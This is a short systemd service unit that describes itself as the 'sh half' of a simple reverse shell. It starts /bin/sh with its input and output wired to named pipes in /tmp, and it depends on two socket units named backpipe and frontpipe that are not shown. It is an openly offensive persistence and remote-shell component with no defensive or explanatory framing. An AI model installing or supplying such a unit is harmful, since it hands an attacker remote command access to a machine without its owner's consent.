; https://www.freedesktop.org/software/systemd/man/systemd.service.html
[Unit]
Description=A simple reverse shell - sh half
Requires=backpipe.socket
Requires=frontpipe.socket

[Service]
Type=simple
; https://github.com/fijimunkii/bash-dev-tcp
StandardInput=file:/tmp/backpipe
StandardOutput=file:/tmp/frontpipe
ExecStart=/bin/sh
